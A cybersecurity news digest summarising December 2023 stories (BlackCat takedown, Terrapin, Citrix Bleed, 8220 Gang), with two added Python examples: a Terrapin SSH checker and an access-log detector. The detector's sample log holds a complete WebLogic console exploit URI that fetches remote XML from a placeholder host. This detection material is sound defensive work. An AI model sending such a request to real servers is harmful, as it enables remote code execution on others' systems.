Daily Brief

Find articles below; each entry carries a generated summary of the linked story.

Total articles found: 11755

Checks for new stories every ~15 minutes

2023-12-19 19:10:33 bleepingcomputer CYBERCRIME Interpol's "Operation HAECHI IV" Nets 3,500 Cybercriminals, $300M
An international law enforcement collaboration, "Operation HAECHI IV," has resulted in the arrest of 3,500 suspects linked to cybercrimes and the seizure of $300 million in criminal proceeds. The operation was conducted between July and December 2023, with South Korean authorities spearheading it alongside agencies from 34 other countries, including the US, UK, Japan, Hong Kong, and India. Targeted crimes included voice phishing, romance scams, sextortion, investment fraud, illegal online gambling, business email compromise, and e-commerce fraud, among others. Interpol's I-GRIP system helped identify and freeze over 82,000 bank accounts associated with these cybercrimes across the participating nations. Seized assets comprised traditional currency and digital assets like NFTs, with a notable arrest of an elusive online gambling criminal in Manila. The latest cyber fraud trends observed from the operation involved digital investment fraud and NFT platform "rug pulls," as well as the use of AI and deep fake technologies for impersonation and scams. Operation HAECHI IV marks a significant increase in success compared to the previous "HAECHI III" operation, with over 260% more arrests and a significant increase in seized funds.
2023-12-19 17:28:26 bleepingcomputer CYBERCRIME FBI Disrupts BlackCat Ransomware Operation and Aids Victims
The FBI successfully seized the servers of the BlackCat (ALPHV) ransomware gang, assisted by a confidential human source. Backed by a federal search warrant, the FBI infiltrated the ransomware backend, obtaining crucial information on their operations. The agency accessed decryption keys and created a tool that has helped more than 400 victims recover their data free of charge. Details on exactly how the decryption keys were obtained are not provided, leading to speculation about possible FBI exploitation of system vulnerabilities. The FBI collected 946 key pairs relating to the gang's Tor-based communication, leak sites, and management panels, giving them control over these URLs. This is the third successful operation against ransomware groups by the FBI, hinting at an effective tactic now in use against cybercriminal infrastructure. The ALPHV/BlackCat ransomware group is expected to potentially shut down and rebrand following this significant law enforcement disruption.
2023-12-19 17:07:37 bleepingcomputer CYBERCRIME New Terrapin Attack Compromises OpenSSH Connection Security
Academic researchers have disclosed the Terrapin attack, a prefix-truncation attack on the SSH transport layer: by injecting and dropping packets during the handshake, an active man-in-the-middle shifts the sequence numbers so that the first encrypted messages after key exchange can be silently deleted without the channel's integrity check failing. The attack works against two widely deployed encryption modes, ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and any CBC cipher combined with Encrypt-then-MAC (*-etm@openssh.com) MACs. Deleting those early messages lets the attacker downgrade the public key algorithms negotiated for user authentication and disable the keystroke timing obfuscation introduced in OpenSSH 9.5. The generic protocol flaw is tracked as CVE-2023-48795; CVE-2023-46445 and CVE-2023-46446 cover related implementation-specific weaknesses in the AsyncSSH library that the same technique enables. All three require the attacker to be positioned to intercept and modify the connection. Internet-wide scans by the researchers found that about 77% of SSH servers supported at least one vulnerable mode, so real-world exposure is broad. The countermeasure is a "strict key exchange" extension, which OpenSSH 9.6 ships (advertised in KEXINIT as the kex-strict-s-v00@openssh.com and kex-strict-c-v00@openssh.com pseudo-algorithms); it only protects a connection when both client and server support it, so disabling the affected modes is the interim option where one side cannot be updated. The researchers have published a Terrapin vulnerability scanner on GitHub for administrators to check their hosts. Because a MitM position is a prerequisite, some vendors have rated CVE-2023-48795 as moderate and deprioritized patches.
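The check the Terrapin story describes can be reproduced from an SSH_MSG_KEXINIT alone. The following added example (not code from the article or from the Terrapin researchers' scanner) parses a KEXINIT payload and applies the same rule the public scanner uses: a peer is susceptible if it offers ChaCha20-Poly1305 or a CBC cipher together with an EtM MAC and does not advertise the strict-kex pseudo-algorithm. The three payloads at the bottom are constructed for the example, not captured handshakes; the "legacy-tolerant" cipher list that still includes aes256-cbc is an assumption (stock OpenSSH defaults do not offer CBC).

```python
"""Added example (not code from the article or the Terrapin researchers):
parse an SSH_MSG_KEXINIT payload and apply the susceptibility rule that the
public Terrapin scanner uses for CVE-2023-48795. The payloads at the bottom
are constructed for this example, not captured handshakes.
"""
import struct

SSH_MSG_KEXINIT = 20
# The ten name-lists of KEXINIT, in wire order (RFC 4253, section 7.1).
KEXINIT_FIELDS = (
    "kex_algorithms",
    "server_host_key_algorithms",
    "encryption_algorithms_client_to_server",
    "encryption_algorithms_server_to_client",
    "mac_algorithms_client_to_server",
    "mac_algorithms_server_to_client",
    "compression_algorithms_client_to_server",
    "compression_algorithms_server_to_client",
    "languages_client_to_server",
    "languages_server_to_client",
)
# Pseudo-algorithms a server / client lists under kex_algorithms to signal
# support for strict key exchange (OpenSSH 9.6 and ports of the fix).
STRICT_KEX_SERVER = "kex-strict-s-v00@openssh.com"
STRICT_KEX_CLIENT = "kex-strict-c-v00@openssh.com"


def _name_list(names):
    """Encode an RFC 4251 name-list: uint32 length + comma-separated names."""
    data = ",".join(names).encode("ascii")
    return struct.pack(">I", len(data)) + data


def build_kexinit(fields, cookie=b"\x00" * 16):
    """Serialise a KEXINIT payload from a dict of name-lists (missing lists are empty)."""
    payload = bytes([SSH_MSG_KEXINIT]) + cookie
    for field in KEXINIT_FIELDS:
        payload += _name_list(fields.get(field, []))
    payload += b"\x00"               # first_kex_packet_follows = FALSE
    payload += struct.pack(">I", 0)  # reserved, always zero
    return payload


def parse_kexinit(payload):
    """Parse a KEXINIT payload (as sent by either side) into a dict of name-lists."""
    if len(payload) < 17 or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not an SSH_MSG_KEXINIT payload")
    pos = 17  # message id (1 byte) + cookie (16 bytes)
    fields = {}
    for field in KEXINIT_FIELDS:
        (length,) = struct.unpack(">I", payload[pos:pos + 4])
        pos += 4
        raw = payload[pos:pos + length].decode("ascii")
        pos += length
        fields[field] = raw.split(",") if raw else []
    return fields


def terrapin_assessment(fields, role="server"):
    """Vulnerable if a Terrapin-affected mode is offered and strict kex is not advertised."""
    ciphers = set(fields["encryption_algorithms_client_to_server"]) | set(
        fields["encryption_algorithms_server_to_client"])
    macs = set(fields["mac_algorithms_client_to_server"]) | set(
        fields["mac_algorithms_server_to_client"])
    chacha = "chacha20-poly1305@openssh.com" in ciphers
    cbc_etm = any(c.endswith("-cbc") for c in ciphers) and any(
        m.endswith("-etm@openssh.com") for m in macs)
    marker = STRICT_KEX_SERVER if role == "server" else STRICT_KEX_CLIENT
    strict = marker in fields["kex_algorithms"]
    return {
        "chacha20_poly1305": chacha,
        "cbc_etm": cbc_etm,
        "strict_kex": strict,
        "vulnerable": (chacha or cbc_etm) and not strict,
    }


# Constructed sample: a legacy-tolerant server that still offers a CBC cipher
# (an assumption for the example; stock OpenSSH defaults do not include CBC).
_BASE = {
    "kex_algorithms": ["curve25519-sha256", "ecdh-sha2-nistp256"],
    "server_host_key_algorithms": ["ssh-ed25519", "rsa-sha2-512"],
    "encryption_algorithms_client_to_server": ["chacha20-poly1305@openssh.com", "aes256-gcm@openssh.com", "aes256-cbc"],
    "encryption_algorithms_server_to_client": ["chacha20-poly1305@openssh.com", "aes256-gcm@openssh.com", "aes256-cbc"],
    "mac_algorithms_client_to_server": ["hmac-sha2-256-etm@openssh.com", "hmac-sha2-256"],
    "mac_algorithms_server_to_client": ["hmac-sha2-256-etm@openssh.com", "hmac-sha2-256"],
    "compression_algorithms_client_to_server": ["none"],
    "compression_algorithms_server_to_client": ["none"],
}
UNPATCHED_SERVER = build_kexinit(_BASE)
# Same server after the strict-kex fix: the marker is appended to kex_algorithms.
PATCHED_SERVER = build_kexinit({**_BASE, "kex_algorithms": _BASE["kex_algorithms"] + [STRICT_KEX_SERVER]})
# Interim mitigation for a host that cannot be updated: drop the affected modes.
HARDENED_SERVER = build_kexinit({**_BASE,
                                 "encryption_algorithms_client_to_server": ["aes256-gcm@openssh.com"],
                                 "encryption_algorithms_server_to_client": ["aes256-gcm@openssh.com"]})

if __name__ == "__main__":
    for name, payload in [("unpatched", UNPATCHED_SERVER), ("strict-kex", PATCHED_SERVER), ("no-vuln-modes", HARDENED_SERVER)]:
        print(name, terrapin_assessment(parse_kexinit(payload)))
```

The "strict_kex" flag is reported separately from "vulnerable" on purpose: a server that advertises kex-strict-s-v00@openssh.com is still attacked successfully by a MitM when the client has not been updated, so the assessment says only that this side has done its part. Feeding a client's KEXINIT with role="client" checks the other marker.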
2023-12-19 15:56:01 thehackernews CYBERCRIME FBI Disrupts BlackCat Ransomware, Unveils Decryption Aid
U.S. Justice Department announces disruption of BlackCat ransomware operations. A free decryption tool released for victims to recover files encrypted by BlackCat malware. The FBI infiltrated the gang through a confidential human source posing as an affiliate. BlackCat, known for being the first Rust-language ransomware, emerged as a major threat since December 2021. The disruption prevented ransom demands totaling approximately $68 million and provided insights into the ransomware's network. Over 946 key pairs used in the ransomware's TOR sites were collected, aiding in their dismantlement. BlackCat utilized a ransomware-as-a-service business model and engaged in double extortion tactics. The cybercrime group is responsible for invading over 1,000 networks worldwide, amassing substantial illegal profits.
2023-12-19 15:19:50 thehackernews CYBERCRIME Exposé on Mikhail Matveev's Global Ransomware Operations Revealed
Cybersecurity researchers from PRODAFT have detailed the operations of a ransomware empire led by Russian national Mikhail Pavlovich Matveev. Matveev, known by multiple aliases including Wazawaka, is linked to the LockBit, Babuk, and Hive ransomware strains. He has been indicted by the U.S. for initiating thousands of ransomware attacks worldwide, often employing aggressive tactics, including threats and dishonesty. Matveev worked with a team of six and had affiliations with various notorious cybercrime groups, including a management role in the Babuk group. The team used sophisticated methods to breach networks, including information gathering through Zoominfo and exploiting known vulnerabilities, with a preference for MeshCentral as their Remote Monitoring and Management tool. The investigation has revealed Matveev's connections to Evgeniy Mikhailovich Bogachev, linked to the GameOver Zeus botnet and Evil Corp. Matveev and his team exhibited a lack of ethical practices, frequently refusing to release files even after victims complied with ransom demands.
2023-12-19 15:04:09 theregister CYBERCRIME Federal Authorities Disrupt AlphV/BlackCat Ransomware Operations
The US Justice Department has provided a decryptor to over 500 victims of the AlphV/BlackCat ransomware, potentially preventing $68 million in ransom payments. US Attorney Markenzy Lapointe, with support from FBI Miami, the US Secret Service, and international partners, highlighted the effort against sophisticated cybercriminals. Following a collaborative operation with the UK, Australia, and Europol, AlphV/BlackCat's old leak site was seized and defaced with an FBI notice. The disruption action has resulted in the ransomware group shifting their servers and leak blog; their resilience and operational status remain uncertain. Despite the takedown, AlphV's most recent victim list remains active, leading to questions about the full impact of the law enforcement's disruption campaign. The historical downtime and seizure of AlphV's platforms combined with the availability of the decryptor could signify the end for AlphV under its current name, although experts believe the group may rebrand and resurface. A National Crime Agency spokesperson emphasized the threat of ransomware and the importance of reporting and protecting against such attacks, pointing to NCSC.gov.uk for advice.
2023-12-19 14:18:07 bleepingcomputer CYBERCRIME FBI Successfully Disrupts Blackcat Ransomware Group's Operations
The FBI infiltrated the servers of the ALPHV, also known as BlackCat, ransomware operation to monitor its activities. During the operation, the FBI collected decryption keys and provided them to over 500 victims to prevent ransom payments. An official decryption tool has been created by the FBI to assist other impacted parties in file recovery without cost. ALPHV's infrastructure compromise by law enforcement has reduced trust among the ransomware's affiliates. Following the disruption, some affiliates resorted to direct email communication with victims, avoiding the gang's infrastructure. Rival ransomware operation LockBit has attempted to recruit affected affiliates of ALPHV. Over the years, this ransomware operation has been breached multiple times by law enforcement under various names such as DarkSide and BlackMatter. The repeated disruption by law enforcement may prompt the ransomware gang to rebrand once again under a new identity.
2023-12-19 13:37:19 thehackernews MALWARE Malicious Use of GitHub Gists and Git Commits by Hackers
Threat actors are using GitHub both to host malware and to control compromised systems, abusing secret Gists and git commit messages as channels for issuing commands. Because the resulting traffic goes to github.com over HTTPS like ordinary developer activity, standard security tools struggle to single it out. Public services used this way act as dead drop resolvers: the implant fetches a benign-looking resource whose content encodes the real command-and-control address or command. Secret Gists do not appear on the author's profile, which makes them attractive for this purpose. The malicious PyPI packages identified relied on encoded URLs pointing at secret Gists to retrieve commands, and a second variant read its commands from git commit messages in an attacker-controlled repository. The fraudulent packages have since been removed from the Python Package Index (PyPI).
2023-12-19 12:00:19 thehackernews MISCELLANEOUS Security Awareness Training Persists Despite Phishing Threats
Employee security awareness training is a common budget item for organizations but is often questioned for its effectiveness, as employees continue to exhibit insecure behaviors. Phishing and social engineering attacks are prevalent, leading to data breaches, yet video-based training only slightly reduces such risks, indicating a need for improved training methods. Organizations prioritize security training, placing it just behind incident response planning, seeing it as an important defense against cyberattacks despite the challenges of measuring its effectiveness. Employees desire engaging and interactive training sessions and request allocated time within their work schedules to accommodate security education. Cybersecuritoons, a new cybersecurity course by Moonlock, offers quick and accessible animated lessons to accommodate the limited time and attention spans of modern workers. Statistics reveal that proper security training can significantly reduce data breach costs, emphasizing the importance of ongoing awareness programs. A culture of feedback and engagement around security practices is encouraged, allowing customization of training content and fostering a security-conscious workforce. Organizations like MacPaw recognize the value in dedicating specific times for employees to focus on security training, suggesting a growing recognition of the importance of cybersecurity knowledge in the workplace.
2023-12-19 11:44:29 thehackernews NATION STATE ACTIVITY Iranian MuddyWater Hackers Target Telecoms in Africa with MuddyC2Go
Iranian group MuddyWater, linked to Iran's Ministry of Intelligence, has been using a new C2 framework, MuddyC2Go, for cyber espionage, particularly targeting African telecom sectors. Broad security expert teams, like Symantec's Threat Hunter Team, are closely monitoring the group's activity, known by various aliases, including Seedworm and TEMP.Zagros. MuddyC2Go, which may have been in use as early as 2020, allows for remote access to compromised systems via an embedded PowerShell script connecting to the group's servers. Recent attacks in November 2023 employed MuddyC2Go alongside other tools, such as custom keyloggers, Venom Proxy, and legitimate remote access software, for initial infiltration and persistence in victim networks. MuddyWater's campaign includes phishing, exploitation of unpatched systems, reconnaissance, lateral movement, and data exfiltration, all while trying to remain undetected by blending with legitimate tools and operations. The group continues to evolve their toolset and tactics, emphasizing that organizations need to monitor and secure against suspicious use of PowerShell. The article also refers to retaliatory cyber activity by an Israeli-linked group, Gonjeshke Darande, targeting Iranian infrastructure in response to regional aggression.
2023-12-19 11:03:31 thehackernews MALWARE Malvertising Campaign Spreads PikaBot via Fake Software Ads
A new malvertising campaign is distributing malware, including PikaBot, disguised as legitimate software such as AnyDesk. PikaBot, emerging in 2023, is known for enabling threat actors to execute commands and further distribute malware payloads, such as Cobalt Strike, from remote servers. Cybersecurity researchers have identified that the malware is propagated via a malicious Google ad that directs users to a counterfeit website delivering the malware. Threat actors are using sophisticated techniques to bypass security measures, including fingerprinting to filter out virtual machines and leveraging legitimate marketing platforms for redirection. Malicious ads have also been found targeting other popular software searches, suggesting a systemic malvertising effort to compromise network security. Trend Micro revealed a new rogue Chrome extension, ParaSiteSnatcher, specifically targeting Latin American users, which intercepts sensitive financial information using extensive permissions. The continuous rise of malvertising and browser-based attacks highlights the need for enhanced security practices like Zero Trust to secure data.
2023-12-19 10:47:43 bleepingcomputer DATA BREACH Over 35 Million Affected in Xfinity Citrix Server Breach
Xfinity (Comcast) disclosed a massive data breach in which an attacker exploited Citrix Bleed (CVE-2023-4966), a critical information-disclosure flaw in Citrix NetScaler ADC and Gateway that leaks session tokens from memory and lets an attacker hijack authenticated sessions, bypassing MFA. Citrix published the patch on October 10 and additional mitigation guidance on October 23; Comcast says it patched and mitigated its systems promptly, but later determined that unauthorized access had already taken place between October 16 and 19, and on October 25 it discovered suspicious activity that led to the finding that personal data of more than 35 million customers had been exfiltrated. Compromised information may include usernames, hashed passwords, partial social security numbers, contact details, dates of birth, and security question answers. Xfinity forced password resets and notified affected parties, though confusion arose when users received reset prompts before any explanation was given. In a separate incident a year earlier, Xfinity accounts were hijacked and used to compromise victims' accounts on platforms such as Coinbase and Gemini. Comcast says the breach did not affect its operations, that it has no indication the stolen data has been leaked, and that no ransom has been demanded. The company urges customers to enable two-factor or multi-factor authentication as an additional safeguard.
2023-12-19 09:31:03 theregister MALWARE Qakbot Malware Reemerges Despite FBI-Led Botnet Disruption
Qakbot malware has resurged just months after a major law enforcement takedown dubbed Operation Duck Hunt. Microsoft Threat Intelligence reports a new low-volume Qakbot phishing campaign targeting the hospitality sector with malicious PDFs. The recent campaign uses a PDF template similar to the one used by Pikabot malware, both associated with group TA577. An updated Qakbot version features 64-bit architecture, AES network encryption, and has new communication patterns. Despite the operation's initial success in seizing Qakbot's infrastructure and operators' crypto wallets, no arrests were made, challenging long-term efficacy. Cybersecurity experts caution that without making arrests, malware networks like Qakbot are likely to adapt and resurface, stressing the need for organizations to maintain strong cybersecurity practices. Comparisons are drawn to Emotet's resurgence post-law enforcement crackdown, suggesting a potential pattern for Qakbot's continued activity.
2023-12-19 07:03:41 thehackernews MALWARE 8220 Gang Targets Oracle WebLogic to Deploy Malware
The 8220 Gang has been exploiting CVE-2020-14883, a remote code execution flaw in the Oracle WebLogic Server Administration Console, to spread malware. On its own the bug requires valid console credentials, so attackers either use stolen credentials or chain it with CVE-2020-14882, a path-traversal authentication bypass in the same console, to reach it unauthenticated. The gang has a track record of turning such flaws into cryptojacking, including an earlier WebLogic Server vulnerability reported in May. Recent attacks point the console at attacker-hosted XML files whose bean definitions execute commands that fetch stealer and mining malware, including Agent Tesla, rhajk, and nasqa. Targets include healthcare, telecommunications, and financial services organizations in several countries, among them the U.S. and Mexico. Despite relatively unsophisticated methods, the 8220 Gang keeps adjusting its techniques to evade detection.
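Both the Xfinity story (Citrix Bleed) and the 8220 Gang story (the WebLogic console chain) come down to requests with a recognisable shape, so one access-log check covers both. The following added example (not code from either article, Citrix, Oracle, or the researchers cited) classifies HTTP access events by those shapes: a request to the NetScaler OpenID configuration endpoint carrying an absurdly long Host header for CVE-2023-4966, and a double-URL-encoded traversal into console.portal, optionally with a handle= parameter naming a Spring application-context or shell class, for CVE-2020-14882 and CVE-2020-14883. The JSON-lines format, the host_len field and every event are constructed for the example; it assumes a reverse proxy or WAF that records the Host header length, which stock NetScaler logs do not, and the 4096-byte threshold is an assumption.

```python
"""Added example (not code from the articles): flag access-log events that
match the Citrix Bleed (CVE-2023-4966) and Oracle WebLogic console
(CVE-2020-14882 + CVE-2020-14883) exploit patterns. The JSON-lines format,
the host_len field and all sample events are constructed for this example.
"""
import json
import re
from urllib.parse import unquote, urlsplit

CITRIX_PATH = "/oauth/idp/.well-known/openid-configuration"
# Public PoCs for CVE-2023-4966 send a Host header of roughly 24,800 bytes.
# 4096 is an assumed threshold, far above any legitimate hostname (max 253).
CITRIX_HOST_LEN = 4096
# Handle classes seen in CVE-2020-14883 exploitation of the admin console.
WEBLOGIC_HANDLES = (
    "FileSystemXmlApplicationContext",
    "ClassPathXmlApplicationContext",
    "ShellSession",
)
_HANDLE_RE = re.compile(r"(?:^|&)handle=([^&]*)")


def classify(event):
    """Return a CVE tag for an exploit-shaped request, or None if it looks benign."""
    parts = urlsplit(event["uri"])
    # CVE-2020-14882 relied on double-encoded traversal (%252e%252e%252f),
    # so decode twice before inspecting path and query.
    path = unquote(unquote(parts.path))
    query = unquote(unquote(parts.query))

    if parts.path == CITRIX_PATH and event.get("host_len", 0) >= CITRIX_HOST_LEN:
        return "CVE-2023-4966"

    if path.endswith("console.portal") and "/../" in path:
        m = _HANDLE_RE.search(query)
        if m and any(h in m.group(1) for h in WEBLOGIC_HANDLES):
            return "CVE-2020-14882+CVE-2020-14883"
        return "CVE-2020-14882"
    return None


def scan(lines):
    """Return (source, tag) pairs for every event that matches an exploit pattern."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        tag = classify(event)
        if tag:
            hits.append((event["src"], tag))
    return hits


# Constructed events using RFC 5737 documentation addresses, not real traffic.
SAMPLE_LOG = [
    '{"src": "192.0.2.10", "method": "GET", "uri": "/index.html", "host_len": 15, "status": 200}',
    '{"src": "192.0.2.11", "method": "GET", "uri": "/oauth/idp/.well-known/openid-configuration", "host_len": 21, "status": 200}',
    '{"src": "198.51.100.7", "method": "GET", "uri": "/oauth/idp/.well-known/openid-configuration", "host_len": 24812, "status": 200}',
    '{"src": "192.0.2.12", "method": "GET", "uri": "/console/login/LoginForm.jsp", "host_len": 18, "status": 200}',
    '{"src": "198.51.100.9", "method": "GET", "uri": "/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://203.0.113.5/poc.xml%22)", "host_len": 18, "status": 200}',
    '{"src": "198.51.100.10", "method": "GET", "uri": "/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=", "host_len": 18, "status": 200}',
]

if __name__ == "__main__":
    for src, tag in scan(SAMPLE_LOG):
        print(f"{src:15} {tag}")
```

The benign openid-configuration request in the sample is deliberately kept: that endpoint is legitimately fetched by OAuth clients, so the path alone is not an indicator and the header length is what separates exploitation from normal traffic. Likewise a hit on the traversal without a handle= parameter is reported as the auth bypass alone, since that is all the request proves.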
2023-12-19 05:47:22 thehackernews RANSOMWARE Global Ransomware Campaign Affects 300 Entities Amidst Evolving Threats
Approximately 300 organizations worldwide have been impacted by the Play ransomware according to a joint advisory from Australia and the U.S. Play ransomware, also known as Balloonfly or PlayCrypt, exploits vulnerabilities in Microsoft Exchange servers and Fortinet appliances to deploy malware. Ransomware attacks are shifting from phishing to exploiting vulnerabilities, with a significant increase noted in the first half of 2023. Adlumin's report suggests that Play has evolved into a ransomware-as-a-service (RaaS) operation, indicating a growing trend in the cybercriminal ecosystem. The Play ransomware group specializes in the double-extortion tactic, encouraging victims to contact them via email for ransom negotiations. U.S. government agencies also shed light on groups like Karakurt, which focus on extortion without encryption, and the temporary offline status of BlackCat ransomware's portals due to speculated law enforcement activity or hardware issues. Collaborations among ransomware groups, such as the joint campaign between BianLian, White Rabbit, and Mario, are becoming more common and are influenced by the roles of initial access brokers and the dispersal of cybercriminal networks following law enforcement actions.